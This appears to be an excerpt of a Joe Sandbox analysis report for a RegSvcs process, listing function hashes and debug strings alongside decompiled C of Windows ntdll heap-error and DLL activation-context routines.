Instruction ID: fd7cae6f06a17e9badc1f8cda75bb97ae8b2bd746ff868777d0f026bfb6ce687
Opcode Fuzzy Hash: 2f09b446c70e9a5dfd98f57298289482b3c579f24b67d227c3af6d1883487143
Instruction Fuzzy Hash: 7F90027160151802D1006199491870B4485A7D0342F51C411A1194555DC665889175B1

Uniqueness

Uniqueness Score: -1.00%

Function 01909A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01909A2A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5eec64519dbc8dbf2967b4f2f60cc4f95f3086f4fe7c8b9813f4a5128cb57236
Instruction ID: 89a33da211557f82dcc4110ce2b520068294f959dea6898249dff3d7a1f698af
Opcode Fuzzy Hash: 5eec64519dbc8dbf2967b4f2f60cc4f95f3086f4fe7c8b9813f4a5128cb57236
Instruction Fuzzy Hash: AA900261A0111442414071A989489068485BBE1251751C521A09C8550DC59988A566A5

Uniqueness

Uniqueness Score: -1.00%

Function 01909A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909A5A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75b08a8ed2eeceab9b43c6c54e0dbe8fc41c82f0e50065b71c80724a28d92beb
Instruction ID: 86b35faf2e948647021610cb80e086fc67fb853d0d2685c4febd5ba10812d91c
Opcode Fuzzy Hash: 75b08a8ed2eeceab9b43c6c54e0dbe8fc41c82f0e50065b71c80724a28d92beb
Instruction Fuzzy Hash: CA90026161191442D20065A94D18B074485A7D0343F51C515A0184554CC95588A16561

Uniqueness

Uniqueness Score: -1.00%

Function 019095D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019095DA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d2ecf7dbef6bc59292c7357b03ffce2ae4fcac3c620d73876e0d4bf626189967
Instruction ID: d84b4f58842328aa849efaca4f637f7621a8d94bb4c0945e25521295e5266516
Opcode Fuzzy Hash: d2ecf7dbef6bc59292c7357b03ffce2ae4fcac3c620d73876e0d4bf626189967
Instruction Fuzzy Hash: E69002A160211403410571994518616848AA7E0241B51C421E1044590DC56588D17165

Uniqueness

Uniqueness Score: -1.00%

Function 01909540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190954A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92e6816c84fd72131138588ac3e4640910472bf1537dea2a988ee7285909bd4e
Instruction ID: cd15b7a2f725d8347d3eea44940d2544e4d703140d81b7ec188c04269e0ec56e
Opcode Fuzzy Hash: 92e6816c84fd72131138588ac3e4640910472bf1537dea2a988ee7285909bd4e
Instruction Fuzzy Hash: 42900265611114030105A599070850744C6A7D5391351C421F1045550CD66188A16161

Uniqueness

Uniqueness Score: -1.00%

Function 01909780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190978A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d0501b36f3c7381cedf55c0939eceb6b13d0a21f9d629800752a308a17d4e9cb
Instruction ID: 8c23978e907e30e3d9009320aa07bfe20be7d5638bfa8e27ff6ef943e8c471b4
Opcode Fuzzy Hash: d0501b36f3c7381cedf55c0939eceb6b13d0a21f9d629800752a308a17d4e9cb
Instruction Fuzzy Hash: 1690026961311402D1807199550C60A4485A7D1242F91D815A0045558CC95588A96361

Uniqueness

Uniqueness Score: -1.00%

Function 019097A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019097AA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 682ffe1f495045a53397379a4ef01beb3ea5c31c482d6ac75f758c0e99fb8cd7
Instruction ID: f15dc0a1afcccc61feaddef1aed8eed84a037cb34fb62c968676dfe398e34f5a
Opcode Fuzzy Hash: 682ffe1f495045a53397379a4ef01beb3ea5c31c482d6ac75f758c0e99fb8cd7
Instruction Fuzzy Hash: CB90026170111403D1407199551C6068485F7E1341F51D411E0444554CD95588966262

Uniqueness

Uniqueness Score: -1.00%

Function 01909FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01909FEA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d285fca7370e6b7131a487e6a02bb4e7a36e038d991c061950150bc18d48ea26
Instruction ID: 0df5bc48647e4a065aea9cf8d83a70907e76aebb429ae4ad9bbc4ec93b473859
Opcode Fuzzy Hash: d285fca7370e6b7131a487e6a02bb4e7a36e038d991c061950150bc18d48ea26
Instruction Fuzzy Hash: 2690027171125802D110619985087064485A7D1241F51C811A0854558DC6D588D17162

Uniqueness

Uniqueness Score: -1.00%

Function 01909710 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190971A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e9e76fb9f41cfd8c5646efd92f74a42cf8a2ee7fdcd0111acff8154542188ab
Instruction ID: 5f7af6e29be13293fddaf2b78f70983c663afa4b83aa58af12cf95ad84f6dc72
Opcode Fuzzy Hash: 5e9e76fb9f41cfd8c5646efd92f74a42cf8a2ee7fdcd0111acff8154542188ab
Instruction Fuzzy Hash: 7290027160111802D10065D9550C6464485A7E0341F51D411A5054555EC6A588D17171

Uniqueness

Uniqueness Score: -1.00%

Function 019096E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019096EA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7bb98f2ed3fd4203b37269f667c2966aa0dc1f4fe975f5e65082ed8286c35a1
Instruction ID: f7d8f3b961b29672c3d4d97361bc2ada5dfbabbe0446c8fc29a26f98911bdbfc
Opcode Fuzzy Hash: c7bb98f2ed3fd4203b37269f667c2966aa0dc1f4fe975f5e65082ed8286c35a1
Instruction Fuzzy Hash: 6A90027160119C02D1106199850874A4485A7D0341F55C811A4454658DC6D588D17161

Uniqueness

Uniqueness Score: -1.00%

Function 01909660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190966A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a90b0cf16f1b0bf4ddc1efd452fc251d6523354df3a3916089644a8a48959ca
Instruction ID: 376900292ab06b0b3b39b0de8ccb88452178784cdb9a038201b57e6ae89245bb
Opcode Fuzzy Hash: 1a90b0cf16f1b0bf4ddc1efd452fc251d6523354df3a3916089644a8a48959ca
Instruction Fuzzy Hash: E490027160111C02D1807199450864A4485A7D1341F91C415A0055654DCA558A9977E1

Uniqueness

Uniqueness Score: -1.00%

Function 0190967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01909694

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b866238059ea987c87fbde005b3ce07cfecbf5d29b40090983b91480dd07f7f6
Instruction ID: 8764428a2269814ecaa2e079fe18b5f661e492a73cc23fb58632b5106653bdaa
Opcode Fuzzy Hash: b866238059ea987c87fbde005b3ce07cfecbf5d29b40090983b91480dd07f7f6
Instruction Fuzzy Hash: 69B09B72D015D5C9D612D7A44B0C7177D4477D0745F16C551D10A0645F8778C0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041FE30 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.357079285.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_41f000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b5655b668a0dba9cca38dbdc3c8037712c92e70910ba05deab25ab6ccecde3
Instruction ID: a0a95376d6efdb23304cb94972eda56fbeaff87ab7d108f1414c85161be59db0
Opcode Fuzzy Hash: 13b5655b668a0dba9cca38dbdc3c8037712c92e70910ba05deab25ab6ccecde3
Instruction Fuzzy Hash: 1FA02220C8830C03002030FE2E0302BF30CC000008F0003EAAC0E022033C02A83000EB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0197B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

The resource is owned exclusively by thread %p, xrefs: 0197B374
The resource is owned shared by %d threads, xrefs: 0197B37E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0197B3D6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0197B47D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0197B323
read from, xrefs: 0197B4AD, 0197B4B2
*** then kb to get the faulting stack, xrefs: 0197B51C
This failed because of error %Ix., xrefs: 0197B446
Go determine why that thread has not released the critical section., xrefs: 0197B3C5
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0197B476
*** enter .exr %p for the exception record, xrefs: 0197B4F1
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0197B314
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0197B53F
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0197B2DC
The critical section is owned by thread %p., xrefs: 0197B3B9
*** Resource timeout (%p) in %ws:%s, xrefs: 0197B352
*** An Access Violation occurred in %ws:%s, xrefs: 0197B48F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0197B484
<unknown>, xrefs: 0197B27E, 0197B2D1, 0197B350, 0197B399, 0197B417, 0197B48E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0197B2F3
*** enter .cxr %p for the context, xrefs: 0197B50D
a NULL pointer, xrefs: 0197B4E0
*** Inpage error in %ws:%s, xrefs: 0197B418
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0197B39B
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0197B38F
The instruction at %p referenced memory at %p., xrefs: 0197B432
write to, xrefs: 0197B4A6
an invalid address, %p, xrefs: 0197B4CF
The instruction at %p tried to %s , xrefs: 0197B4B6
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0197B305

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 0de6c4032185c1750bcf8fd073d4f3c12bed6fedba7da1169613c585ab610a08
Instruction ID: 2d26f67ee63cb69d830ac7d65b47f273b1105cccdf5be62b88c5804c033e3530
Opcode Fuzzy Hash: 0de6c4032185c1750bcf8fd073d4f3c12bed6fedba7da1169613c585ab610a08
Instruction Fuzzy Hash: 95811835A01200FFEB259A4ACCC5DBB3F29EF96B56F454048F90E6B312D3659641C772

Uniqueness

Uniqueness Score: -1.00%

Function 01981C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01981C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018CB150();
				} else {
					E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x19b589c);
				E018CB150("Heap error detected at %p (heap handle %p)\n",  *0x19b58a0);
				_t27 =  *0x19b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01981E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018CB150();
				} else {
					E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E018CB150("Error code: %d - %s\n",  *0x19b5898);
				_t113 =  *0x19b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Parameter1: %p\n",  *0x19b58a4);
				}
				_t115 =  *0x19b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Parameter2: %p\n",  *0x19b58a8);
				}
				_t117 =  *0x19b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E018CB150("Parameter3: %p\n",  *0x19b58ac);
				}
				_t119 =  *0x19b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E018CB150();
					} else {
						E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19b58b4);
					E018CB150("Last known valid blocks: before - %p, after - %p\n",  *0x19b58b0);
				} else {
					_t120 =  *0x19b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E018CB150();
				} else {
					E018CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E018CB150("Stack trace available at %p\n", 0x19b58c0);
			}

0x01981c10
0x01981c16
0x01981c1e
0x01981c3d
0x01981c3e
0x01981c20
0x01981c35
0x01981c3a
0x01981c44
0x01981c55
0x01981c5a
0x01981c65
0x01981c67
0x00000000
0x01981c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01981c67
0x01981cdc
0x01981ce5
0x01981d04
0x01981d05
0x01981ce7
0x01981cfc
0x01981d01
0x01981d0b
0x01981d17
0x01981d1f
0x01981d25
0x01981d30
0x01981d4f
0x01981d50
0x01981d32
0x01981d47
0x01981d4c
0x01981d61
0x01981d67
0x01981d68
0x01981d6e
0x01981d79
0x01981d98
0x01981d99
0x01981d7b
0x01981d90
0x01981d95
0x01981daa
0x01981db0
0x01981db1
0x01981db7
0x01981dc2
0x01981de1
0x01981de2
0x01981dc4
0x01981dd9
0x01981dde
0x01981df3
0x01981df9
0x01981dfa
0x01981e00
0x01981e0a
0x01981e13
0x01981e32
0x01981e33
0x01981e15
0x01981e2a
0x01981e2f
0x01981e39
0x01981e4a
0x01981e02
0x01981e02
0x01981e08
0x00000000
0x00000000
0x01981e08
0x01981e5b
0x01981e7a
0x01981e7b
0x01981e5d
0x01981e72
0x01981e77
0x01981e95

Strings

heap_failure_buffer_underrun, xrefs: 01981C9F
heap_failure_usage_after_free, xrefs: 01981CBB
heap_failure_buffer_overrun, xrefs: 01981C98
Last known valid blocks: before - %p, after - %p, xrefs: 01981E45
heap_failure_unknown, xrefs: 01981C75
Stack trace available at %p, xrefs: 01981E86
Error code: %d - %s, xrefs: 01981D12
heap_failure_multiple_entries_corruption, xrefs: 01981C8A
heap_failure_generic, xrefs: 01981C7C
HEAP: , xrefs: 01981C16, 01981C3D, 01981D04, 01981D4F, 01981D98, 01981DE1, 01981E32, 01981E7A
heap_failure_internal, xrefs: 01981C6E
Parameter1: %p, xrefs: 01981D5C
heap_failure_block_not_busy, xrefs: 01981CA6
heap_failure_cross_heap_operation, xrefs: 01981CC2
Parameter2: %p, xrefs: 01981DA5
heap_failure_freelists_corruption, xrefs: 01981CC9
heap_failure_lfh_bitmap_mismatch, xrefs: 01981CD7
heap_failure_invalid_argument, xrefs: 01981CAD
heap_failure_virtual_block_corruption, xrefs: 01981C91
Heap error detected at %p (heap handle %p), xrefs: 01981C50
Parameter3: %p, xrefs: 01981DEE
heap_failure_entry_corruption, xrefs: 01981C83
heap_failure_invalid_allocation_type, xrefs: 01981CB4
HEAP[%wZ]: , xrefs: 01981C30, 01981CF7, 01981D42, 01981D8B, 01981DD4, 01981E25, 01981E6D
heap_failure_listentry_corruption, xrefs: 01981CD0

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: ce5ac4dded8493074c7ee0ab39698a82760e88cf83a69e5097106d7ff46ecff2
Instruction ID: 4b8d3a85fe53f9dcadb6d3f605be7c89ad8c29fe79f401d4fc8c91b07b5e211b
Opcode Fuzzy Hash: ce5ac4dded8493074c7ee0ab39698a82760e88cf83a69e5097106d7ff46ecff2
Instruction Fuzzy Hash: 3F61E532914945DFE221BB89D4C5E6473A8EB04F61B0A843EF50EDB311D678DE46CB0B

Uniqueness

Uniqueness Score: -1.00%

Function 018F8E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E018F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x19bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x19b8464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x19b5780 & 0x00000003) != 0) {
							E01945510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x19b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0190B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x19b7984; // 0x1392b70
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x19b8464; // 0x761c0110
					 *0x19bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E018F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x19b5780 & 0x00000005) != 0) {
						_push(_t49);
						E01945510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x018f8e0f
0x018f8e16
0x018f8e19
0x018f8e1b
0x018f8e21
0x018f8e7f
0x018f8e85
0x01939354
0x0193936c
0x01939371
0x0193937b
0x01939381
0x01939381
0x0193937b
0x018f8e9d
0x018f8e9d
0x018f8e29
